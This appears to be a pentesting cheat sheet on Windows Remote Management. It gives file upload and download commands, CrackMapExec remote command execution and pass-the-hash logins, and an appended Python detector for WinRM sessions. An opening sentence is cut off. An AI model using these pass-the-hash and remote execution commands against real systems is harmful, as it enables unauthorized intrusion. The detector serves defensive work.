WinRM is the Microsoft implementation of the WS-Management Protocol, which provides a common way for systems to access and exchange management information across an IT infrastructure. Default ports are 5985 (HTTP),
After connecting, a number of useful commands are available in the session.
Note that we need to specify the absolute path for uploading and downloading.
```
# Upload a local file to the Windows machine
PS> upload ./example.bat c:\\Users\Administrator\Desktop\exploit.bat

# Download a file to the local machine
PS> download c:\\Users\Administrator\Desktop\example.txt ./example.txt

# List all services
PS> services
```
CrackMapExec is a swiss army knife for pentesting networks.
The official docs say it is recommended to run it via Poetry, a Python package manager.
First, move to the directory where CrackMapExec is installed and run `poetry install`.
```
cd crackmapexec
poetry install
```
Then execute it with `poetry run`.
```
# Login and CMD execution (-x)
poetry run crackmapexec winrm <target-ip> -d DomainName -u username -p password -x 'whoami'

# Login and PowerShell execution (-X)
poetry run crackmapexec winrm <target-ip> -d DomainName -u username -p password -X '$PSVersionTable'

# Pass the Hash and CMD execution (-x)
poetry run crackmapexec winrm <target-ip> -d DomainName -u username -H <HASH> -x 'whoami'

# Pass the Hash and PowerShell execution (-X)
poetry run crackmapexec winrm <target-ip> -d DomainName -u username -H <HASH> -X '$PSVersionTable'
```
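As the defender's counterpart to the commands above, here is an added example (not from this page, Evil-WinRM or CrackMapExec) that correlates Windows Security log events on the target to surface WinRM remote sessions: a network logon (4624, type 3) followed by a `wsmprovhost.exe` start (4688) under the same logon ID, with NTLM-authenticated sessions rated higher because pass-the-hash logons authenticate with NTLM rather than Kerberos. The JSON field names, the sample events and the 60-second window are assumptions.

```python
import json
from datetime import datetime, timedelta

# Constructed sample events in JSON-lines form; the field names are an assumption
# about how an exporter would flatten Security log records (4624 = logon, 4688 = process creation).
SAMPLE_EVENTS = r"""
{"time":"2024-05-01T10:00:00","id":4624,"user":"alice","logon_type":3,"auth":"NTLM","src_ip":"10.0.0.5","logon_id":"0x3e7a1"}
{"time":"2024-05-01T10:00:02","id":4688,"user":"alice","process":"C:\\Windows\\System32\\wsmprovhost.exe","logon_id":"0x3e7a1"}
{"time":"2024-05-01T11:00:00","id":4624,"user":"bob","logon_type":3,"auth":"Kerberos","src_ip":"10.0.0.9","logon_id":"0x4f001"}
{"time":"2024-05-01T11:00:01","id":4688,"user":"bob","process":"C:\\Windows\\System32\\wsmprovhost.exe","logon_id":"0x4f001"}
{"time":"2024-05-01T12:00:00","id":4624,"user":"svc","logon_type":3,"auth":"NTLM","src_ip":"10.0.0.7","logon_id":"0x5a000"}
{"time":"2024-05-01T12:30:00","id":4688,"user":"svc","process":"C:\\Windows\\System32\\notepad.exe","logon_id":"0x5a000"}
"""

WINDOW = timedelta(seconds=60)  # assumed max gap between the logon and the WinRM host process start


def parse_events(text):
    """Parse JSON lines into event dicts, skipping blank lines."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def detect_winrm_sessions(events):
    """Return one finding per wsmprovhost.exe start that follows a network logon
    with the same logon ID inside WINDOW. NTLM is rated 'high' because a
    pass-the-hash logon over WinRM authenticates with NTLM; Kerberos is the
    normal case for domain users. This is a hunting signal, not proof of misuse."""
    logons = {e["logon_id"]: e for e in events if e["id"] == 4624 and e["logon_type"] == 3}
    findings = []
    for e in events:
        if e["id"] != 4688 or not e["process"].lower().endswith("\\wsmprovhost.exe"):
            continue
        logon = logons.get(e["logon_id"])
        if logon is None:
            continue
        gap = datetime.fromisoformat(e["time"]) - datetime.fromisoformat(logon["time"])
        if not (timedelta(0) <= gap <= WINDOW):
            continue
        findings.append({
            "user": e["user"],
            "src_ip": logon["src_ip"],
            "auth": logon["auth"],
            "severity": "high" if logon["auth"] == "NTLM" else "info",
        })
    return findings


if __name__ == "__main__":
    for f in detect_winrm_sessions(parse_events(SAMPLE_EVENTS)):
        print(f)
```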